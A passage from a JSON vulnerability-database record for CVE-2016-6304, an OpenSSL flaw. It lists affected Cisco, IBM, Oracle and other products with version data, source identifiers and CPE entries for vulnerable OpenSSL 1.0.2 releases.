"vendor": "ibm", "version": "2.4.0.4" }, { "model": "nexus series switches", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "1000v0" }, { "model": "netsight appliance", "scope": "eq", "trust": 0.3, "vendor": "extremenetworks", "version": "5.1" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.2.34" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.5.1" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.0.5" }, { "model": "project openssl", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "1.0.1" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.1.6" }, { "model": "mysql enterprise monitor", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "3.2.4.1102" }, { "model": "virtual security gateway", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.3.32" }, { "model": "access manager", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "10.1.4.3.0" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.1.5" }, { "model": "nac appliance", "scope": "eq", "trust": 0.3, "vendor": "extremenetworks", "version": "7.0" }, { "model": "fujitsu m10-4s server xcp", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "2230" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.1.38" }, { "model": "telepresence tx9000 series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.1.35" }, { "model": "smartcloud entry appliance fp", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2.0.4" }, { "model": "netsight appliance", "scope": "eq", "trust": 0.3, "vendor": "extremenetworks", "version": "7.0.5" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "3.2.21" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "3.2.22" }, { "model": "project openssl 1.0.1j", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.3.12" }, { "model": "series digital media players", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "43000" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "3.1.6" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "3.1.4" }, { "model": "universal small cell series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "70003.4.2.0" }, { "model": "telepresence system series", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "30006.1" }, { "model": "unity connection", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.1.4" }, { "model": "security manager", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4.13" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.1.0" }, { "model": "ucs b-series blade servers", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2" }, { "model": "identifi wireless", "scope": "eq", "trust": 0.3, "vendor": "extremenetworks", "version": "10.11.1" }, { "model": "mysql enterprise monitor", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "3.1.3.7856" }, { "model": "ucs standalone c-series rack server integrated management cont", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "-0" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.2.12" }, { "model": "sonas", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.5.0.1" }, { "model": "telepresence integrator c series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "spectrum control", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.9" }, { "model": "security network protection", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "5.3.2.5" }, { "model": "project openssl 1.0.1d", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "fujitsu m10-4s server xcp", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "2290" }, { "model": "storwize unified", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70001.6.0.0" }, { "model": "security network controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.3381" }, { "model": "enterprise content delivery system", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "2.6.9" }, { "model": "nexus series switches", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "60000" }, { "model": "commerce experience manager", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6.5.1" }, { "model": "infinity", "scope": "eq", "trust": 0.3, "vendor": "pexip", "version": "7" }, { "model": "mds series multilayer switches 5.2.8", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "9000" }, { "model": "series digital media players 5.4.1 rb4", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4300" }, { "model": "ucs standalone c-series rack server integrated management cont", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "-3.0" }, { "model": "storwize unified", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70001.5.2.1" }, { "model": "ios and cisco ios xe software", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "16.1" }, { "model": "infinity", "scope": "eq", "trust": 0.3, "vendor": "pexip", "version": "4" }, { "model": "prime network", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "telepresence tx9000 series", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "6.1" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.4.2.0" }, { "model": "prime performance manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "tealeaf customer experience on cloud network capture add-on", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "16.1.01" }, { "model": "smart net total care local collector appliance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "-0" }, { "model": "prime collaboration provisioning", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.12" }, { "model": "project openssl 1.1.0a", "scope": "ne", "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "connected grid routers", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "15.8.9" }, { "model": "network analysis module", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "commerce experience manager", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6.5.2" }, { "model": "nexus series fabric switches aci mode", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "9000-0" }, { "model": "fujitsu m10-4 server xcp", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "2320" }, { "model": "prime performance manager sp1611", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "1.7" }, { "model": "worklight consumer edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.0.1" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.0.12" }, { "model": "fujitsu m10-4s server xcp", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "2280" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.0.22" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1.6.0" }, { "model": "unified ip phone 9.3 sr3", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "6901" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.0.16" }, { "model": "telepresence server and mse", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "701087100" }, { "model": "infinity", "scope": "eq", "trust": 0.3, "vendor": "pexip", "version": "12.2" }, { "model": "jboss core services on rhel server", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "60" }, { "model": "storwize unified", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70001.5.1.3" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "3.2.10" }, { "model": "mds series multilayer switches", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "90006.2.19" }, { "model": "aironet series access points", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "270015.5(3)" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.1.18" }, { "model": "spectrum control", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.11" }, { "model": "telepresence server on virtual machine", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "mysql enterprise monitor", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "3.3.0.1098" }, { "model": "webex meetings for android", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "rational application developer for websphere software", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.5" }, { "model": "nexus series switches 5.2.8", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "5000" }, { "model": "security network controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.3376" }, { "model": "nac appliance", "scope": "eq", "trust": 0.3, "vendor": "extremenetworks", "version": "5.0" }, { "model": "digital media manager 5.4.1 rb4", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "unified workforce optimization quality management solution", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "-0" }, { "model": "telepresence integrator c series tc7.3.7", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "tivoli provisioning manager for os deployment", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.3" }, { "model": "sparc enterprise m9000 xcp", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1121" }, { "model": "spa122 analog telephone adapter with router", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "1.4.2" }, { "model": "cloud object storage", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "sterling connect:express for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.4" }, { "model": "rrdi", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0.1" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.3.2" }, { "model": "worklight enterprise edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.0.2" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.0.14" }, { "model": "sonas", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.5.2.4" }, { "model": "email gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.6.3" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.2.0.4" }, { "model": "unified intelligent contact management enterprise", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "purview appliance", "scope": "ne", "trust": 0.3, "vendor": "extremenetworks", "version": "7.0.6" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.0.10" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.2.4" }, { "model": "application and content networking system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "project openssl 1.0.1k", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "anyconnect secure mobility client for ios", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "business intelligence enterprise edition", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "11.1.1.7.0" }, { "model": "ace application control engine", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "47100" }, { "model": "oss support tools", "scope": "ne", "trust": 0.3, "vendor": "oracle", "version": "8.15.17.3.14" }, { "model": "anyconnect secure mobility client for mac os", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "x0" }, { "model": "fujitsu m12-2s server xcp", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "2320" }, { "model": "business intelligence enterprise edition", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "12.2.1.2.0" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.0.2" }, { "model": "commerce guided search", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6.4.1.2" }, { "model": "tealeaf customer experience", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0.2" }, { "model": "project openssl 1.0.1b", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "prime infrastructure plug and play standalone gateway", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.1.2" }, { "model": "tivoli provisioning manager for images build", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.20290.1" }, { "model": "virtual security gateway", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "2.1.6" }, { "model": "nac appliance", "scope": "ne", "trust": 0.3, "vendor": "extremenetworks", "version": "7.0.6" }, { "model": "nexus series switches", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "50006.2.19" }, { "model": "project openssl 1.0.1u", "scope": "ne", "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "3.0.14" }, { "model": "telepresence conductor", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "application policy infrastructure controller", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.0" }, { "model": "jabber for mac", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "fujitsu m12-1 server xcp", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "2320" }, { "model": "infinity", "scope": "eq", "trust": 0.3, "vendor": "pexip", "version": "8.1" }, { "model": "storwize unified", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70001.5.2.2" }, { "model": "jabber for iphone and ipad", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.8" }, { "model": "prime network registrar", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "9.0" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.3" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "3.2" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.0.0.0" }, { "model": "cognos metrics manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2.2" }, { "model": "infinity", "scope": "eq", "trust": 0.3, "vendor": "pexip", "version": "12.1" }, { "model": "i", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.0.0" }, { "model": "worklight enterprise edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.0.1" }, { "model": "telepresence video communication server", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "x8.8.3" }, { "model": "netsight appliance", "scope": "ne", "trust": 0.3, "vendor": "extremenetworks", "version": "7.0.6" }, { "model": "communications eagle lnp application processor", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "10.1.0.0.0" }, { "model": "sparc enterprise m4000 xcp", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1117" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.4.1" }, { "model": "series digital media players 5.4.1 rb4", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4400" }, { "model": "sterling connect:express for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.5.0" }, { "model": "multicast manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "aironet series access points", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "270016.3" }, { "model": "sterling b2b integrator", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2" }, { "model": "cognos business intelligence server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2" }, { "model": "anyconnect secure mobility client for ios", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4.0.7" }, { "model": "infinity", "scope": "eq", "trust": 0.3, "vendor": "pexip", "version": "5" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.3.16" }, { "model": "secure access control system", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "5.8.0.32.8" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.2.4" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.3.8" }, { "model": "webex node for mcs", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "telepresence mcu", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4.5(1.89)" }, { "model": "management appliance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "anyconnect secure mobility client for windows", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4.0.7" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "3.1.2" }, { "model": "videoscape anyres live", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "video surveillance ptz ip cameras", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.0.2" }, { "model": "video distribution suite for internet streaming", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4.003(002)" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.2" }, { "model": "telepresence server on multiparty media", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "8204.4" }, { "model": "telepresence serial gateway series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "i", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.3" }, { "model": "project openssl 1.0.2c", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.0.4" }, { "model": "email gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.6.400" }, { "model": "unified ip phone", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "89610" }, { "model": "expressway series", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "x8.8.3" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.0.12" }, { "model": "commerce guided search", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6.3" }, { "model": "prime network", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "431" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.1.28" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.3.7" }, { "model": "telepresence system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "500-320" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.3.33" }, { "model": "unified attendant console enterprise edition", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.2.0.14" }, { "model": "unified contact center express", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "fujitsu m10-1 server xcp", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "2230" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.0.26" }, { "model": "tivoli provisioning manager for os deployment", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.0.36" }, { "model": "network analysis module 6.2", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "telepresence system ex series ce8.2.2", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "prime data center network manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "mxe series media experience engines", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "35000" }, { "model": "nac appliance", "scope": "eq", "trust": 0.3, "vendor": "extremenetworks", "version": "5.1" }, { "model": "project openssl 1.0.2b", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "universal small cell cloudbase factory recovery root filesystem", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "3.17.3" }, { "model": "videoscape control suite", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "unified communications manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "tandberg codian mse", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "83200" }, { "model": "ip series phones vpn feature", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "8800-0" }, { "model": "sparc enterprise m8000 xcp", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1118" }, { "model": "mobilefirst platform foundation", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.0" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.1.9" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.1.3" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.1.42" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "3.2.25" }, { "model": "smartcloud entry", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2" }, { "model": "enterprise manager base platform", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "13.2.0.0" }, { "model": "tealeaf customer experience", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.6" }, { "model": "unified meetingplace 8.6mr1", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "email gateway", "scope": "ne", "trust": 0.3, "vendor": "mcafee", "version": "7.6.406-3402.103" }, { "model": "telepresence mx series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "tapi service provider", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "video surveillance series ip cameras", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "70002.9" }, { "model": "telepresence system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "500-370" }, { "model": "fujitsu m12-2 server xcp", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "2230" }, { "model": "sonas", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.5.0.2" }, { "model": "spa525g 5-line ip phone", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "telepresence profile series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "sonas", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.5.1.0" }, { "model": "secure access control system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "unified ip conference phone for third-party call control 9.3 sr3", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "8831" }, { "model": "unified ip series phones", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "79000" }, { "model": "fujitsu m10-1 server xcp", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "2290" }, { "model": "spa232d multi-line dect analog telephone adapter", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "1.4.2" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.6" }, { "model": "visual quality experience tools server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "virtualization experience media edition", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "nexus series fabric switches aci mode", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "9000-0" }, { "model": "enterprise manager ops center", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "12.3.2" }, { "model": "emergency responder", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "email gateway 7.6.405h1157986", "scope": null, "trust": 0.3, "vendor": "mcafee", "version": null }, { "model": "project openssl 1.0.1l", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.7" }, { "model": "registered envelope service", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.2.35" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.3.5" }, { "model": "universal small cell series", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "70003.5.12.23" }, { "model": "firesight system software", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "smartcloud entry appliance fi", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.3.0.4" }, { "model": "webex meetings client hosted t32", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.1.2" }, { "model": "unified meetingplace", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "security virtual server protection for vmware", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.1" }, { "model": "unified contact center express", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.6" }, { "model": "infinity", "scope": "eq", "trust": 0.3, "vendor": "pexip", "version": "6" }, { "model": "tivoli provisioning manager for images system edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x7.1.1.0" }, { "model": "webex meetings server", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "2.6.1.30" }, { "model": "sparc enterprise m3000 xcp", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1118" }, { "model": "fujitsu m12-2 server xcp", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "2290" }, { "model": "project openssl 1.0.1h", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "sparc enterprise m5000 xcp", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1117" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.2.0.13" }, { "model": "email gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.6.402" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "2.0.10" }, { "model": "project openssl 1.0.1p", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null } ], "sources": [ { "db": "BID", "id": "93150" }, { "db": "JVNDB", "id": "JVNDB-2016-004990" }, { "db": "CNNVD", "id": "CNNVD-201609-579" }, { "db": "NVD", "id": "CVE-2016-6304" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.2a:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.2e:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.2b:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.2h:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.2c:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.2:beta3:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.2:beta1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.2f:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.2:beta2:*:*:*:*:*:*", 